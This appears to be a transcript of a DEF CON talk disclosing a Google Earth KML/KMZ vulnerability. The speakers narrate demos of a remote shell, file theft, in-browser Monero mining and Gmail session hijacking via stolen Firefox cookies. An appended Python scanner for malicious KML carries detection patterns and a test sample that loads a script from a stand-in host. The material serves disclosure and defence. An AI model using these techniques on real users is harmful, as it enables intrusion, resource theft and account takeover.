We would like to say first of all, thanks to everybody that made it possible to be here, to the DEF CON staff, the Baidu, everybody. This is a dream. Thank you very much. Well, we both are big bags of nerves, so we will try to do our best. Well, presentations. My partner, my colleague, he comes from Argentina. He is one of the members of the red team in Isaac Auditors. We work together, and he has been a bug bounty hunter since a long time ago. Well, this is his Twitter account, and me, I am Gonzalo Sanchez. I come from Spain. I am the red team leader in Isaac Auditors. Well, this is my LinkedIn account in case anybody wants to contact us.

Hello, DEF CON. Today we present how to address an opponent, Google, with a different compression format. Well, what we are going to talk about: we bring a vulnerability in Google Earth. Why Google Earth? Well, because Google is a challenge. A very huge company with fantastic products, with a very good reputation, with reliable levels of security in their products. Many people use Google products, and if you are able to find a vulnerability and use it to spread malware, you are using their platform with a spreading potential that is very huge, very big. So, in this case, for a malware application, it's perfect.

Nice Killombo. This is the name of the company. Nice Killombo is a very popular phrase in Argentina, which refers to having one or more problems. Confusion, problem, mess. This is Killombo.

Well, the attack vector: KML files. What is a KML file? Well, it's a file with a format very similar to XML, with geographical information inside. This is the key import table in Google Earth. We are going to work with the description field of the KML file. We are going to show an example of a file. Please, guys, can you connect the screen? We are going to show an example of a KML file with a location, which is this hotel. Easy. It's a very similar format compared to, sorry, with an XML file. The key here is that we have fields with the location of the hotel, names, what, and here the magic, the description field. This is the field that we are going to use in the next vulnerabilities.

Another kind of file for attack vectors, KMZ, is the same as a KML file, but compressed with ZIP format. If you take the same file that we have seen, you compress it in a KMZ file and you import it in Google Earth, Google Earth renders the file and shows the location. There is no need to waste time with that. There is an advantage when we talk about KMZ files, which is the obfuscation, because the file is compressed and it complicates identifying the payload of the file. They are not suspicious files. We are familiar with executable files talking about malware, but probably if you see a KML file, you don't suspect this file. This is an advantage for us. It's obfuscated because it's compressed and it's very common on the Internet. We can find a lot of files on the Internet. Where can we find these kinds of files? Well, forums, for example, Pokemon Go, sites of bicycle routes, official sites with geographical information, earthquakes, fires. This is an example of NASA. There's a lot of information shared in these kinds of formats.

This scenario. This is the victim, a host with Google Earth installed. The victim imports a KML file, and into this file comes the downloader. The downloader is executed and communicates with an intermediate server that is communicating with the real attacker, with the real payload that is downloaded by the intermediate server and delivered to the victim. After that, the connection is directly with the attacker.

Versions affected. We have detected this problem with the current versions of Google Earth for Windows and Linux. In this presentation, we are focused on the Windows version. Summary. Location. The vulnerability is present in the JavaScript core of Google Earth. We are talking about a null pointer and also an injection of JavaScript. We are going to see this in detail. We bring three impacts to show: a remote shell and a Google cookie takeover using the null pointer vulnerability, and Monero mining using the JavaScript injection.

This is a virtual machine that will be the attacker. The victim is my computer. My computer is Windows. This is the virtual machine with the real attacker. The victim has Google Earth and it has imported a site with an arbitrary name. In this case, it's Google One. We have to start the server. The server is the intermediate server. In order to make the presentation easy, the intermediate server and the attacker will be the same machine, this one. The intermediate server is the attacker. This is the intermediate server. The victim has imported and clicked on the site, and the connection has been received into the intermediate server. We have it, and we are going to show the remote shell, impact one. First of all, basic command execution. We will show and we will serve the exploit. DEF CON has the exploit and probably will serve it when Google fixes this problem. But this is a help to use it. We are going to execute the remote command. A basic operation, like an example, and it's received. Now we can access files in the victim. The file is downloaded and we have it in the attacker machine. We have access to the victim's files. The file is downloaded and we can check it. This is for impact one, remote shell and file access into the victim's files.

Guys, please return to the presentation. Impact two, we are going to use the victim's computer to mine Monero. Here we have a problem because we are using JavaScript code from CoinHive. Unfortunately, we cannot connect to this site with the internet connection. But we can show at least the KML file. Here we are not exploiting the null pointer vulnerability. Here we are injecting JavaScript code into the description field. What we are doing here is connecting with CoinHive and downloading the JavaScript code for the Monero mining. When you import this file in Google Earth, the machine starts mining and resources collapse. You have a problem with your computer, but as I said, we cannot show this problem because there is a problem with the internet connection in this case. We can continue with the presentation.

The last impact is the Google account hijacking. What we are going to do is take over the cookies of the victim, which is what we are doing now. Because we have access to the files in the victim's computer, we are accessing the cookies.sqlite file in the Firefox folder, where the victim stores its own Gmail cookies. What do we need in this case? This is a type of social engineering attack, because we need the victim to have opened the Firefox browser with an open session in Gmail, with this file with the credentials inside. In this attack, the victim, with the browser opened and the Gmail account opened, imports the KML file in Google Earth, and we have access to its cookies file. Now we go to our browser. This is the folder of the attacker, because we are going to open the Firefox browser in the attacker PC, opening the cookies of the victim. We delete any cookie in the attacker's browser cookies file, then export; the information is exported. We are going to import the format in order to make it easy. The malicious file, something is going wrong. We can show this on a video.

If you can see this, this is a virtual machine, Windows, of the victim. The victim has opened Firefox. Now we are starting the server, as we did some seconds ago, and the victim clicks on the malicious file. Here the connection is received, and now we execute with the getCookie option. Here we have exported the file; here we are exporting this V4 from the Mozilla cookies table. This is the cookies file of the Mozilla Firefox of the attacker. We are going to drop the table with the cookies of the attacker, and we are going to import here the victim's cookies. Drop the current table of Mozilla cookies and import with the file generated. Open Firefox, and we have the session of the victim. Please excuse that we didn't achieve this in the live show, but it's so difficult to achieve.

So these are the three impacts that we wanted to show. It's a short description, for when DEF CON shares the exploit with everybody. The malicious KML file we have seen so many times this morning. This is the server, the intermediate server that receives the communications from the victim, and this is the attacker; this is the Python that has mainly all the functionality. Everything is developed in Python, and this is the structure of the exploit. Many thanks for everything. Incredibly hard two days, with a lot of problems with connections, and it was hard for us to bring, but at least we could show you this material. So thank you very much to everybody, especially the guys that helped us in the last hour. Hector Paulino, a lot of people. Thank you everybody for being here and giving us the opportunity to tell this and show this. I hope you enjoy the material. Thanks.
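An added example, not code from the talk or from the speakers' exploit: a small Python scanner a defender could run over KML and KMZ files before they are opened in Google Earth. It unpacks a KMZ archive, parses each KML document inside, and flags active HTML content (script tags, remote script sources, inline event handlers, javascript: URIs) in the description and balloon text fields the talk identifies as the injection point. The sample documents and the miner.example host are constructed for the example.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET

# Google Earth renders the description field as an HTML balloon, so any
# script-bearing HTML inside it is what we want to surface for review.
SUSPICIOUS = {
    "script_tag": re.compile(r"<\s*script\b", re.I),
    "iframe_tag": re.compile(r"<\s*iframe\b", re.I),
    "js_uri": re.compile(r"javascript\s*:", re.I),
    "event_handler": re.compile(r"\son\w+\s*=", re.I),
    "remote_script_src": re.compile(r"<\s*script[^>]*\bsrc\s*=\s*['\"]?https?://", re.I),
}
# KML elements whose text ends up rendered as HTML (description, BalloonStyle text, Snippet).
HTML_FIELDS = {"description", "text", "Snippet"}

def _local(tag):
    """Strip the XML namespace prefix ({uri}name -> name)."""
    return tag.rsplit("}", 1)[-1]

def scan_kml(kml_bytes):
    """Return a list of (field, finding) pairs for active content in one KML document."""
    findings = []
    for elem in ET.fromstring(kml_bytes).iter():  # CDATA text is returned as plain text
        if _local(elem.tag) in HTML_FIELDS and elem.text:
            for label, pattern in SUSPICIOUS.items():
                if pattern.search(elem.text):
                    findings.append((_local(elem.tag), label))
    return findings

def scan_file(data):
    """Scan raw bytes that are either a KML document or a KMZ (zip) archive."""
    if data[:2] != b"PK":  # not a zip: plain KML
        return [("<kml>",) + f for f in scan_kml(data)]
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:  # KMZ: scan every .kml entry
        for name in zf.namelist():
            if name.lower().endswith(".kml"):
                findings += [(name,) + f for f in scan_kml(zf.read(name))]
    return findings

def build_kmz(kml_bytes):
    """Pack a KML document into a KMZ archive (constructed test input)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("doc.kml", kml_bytes)
    return buf.getvalue()

# Constructed samples: a benign placemark and one carrying a remote script in its description.
BENIGN = b"""<kml xmlns="http://www.opengis.net/kml/2.2"><Placemark><name>Hotel</name>
<description><![CDATA[<b>Conference venue</b>]]></description>
<Point><coordinates>-115.17,36.12,0</coordinates></Point></Placemark></kml>"""
SCRIPTED = b"""<kml xmlns="http://www.opengis.net/kml/2.2"><Placemark><name>Hotel</name>
<description><![CDATA[<script src="http://miner.example/m.js"></script>]]></description></Placemark></kml>"""
```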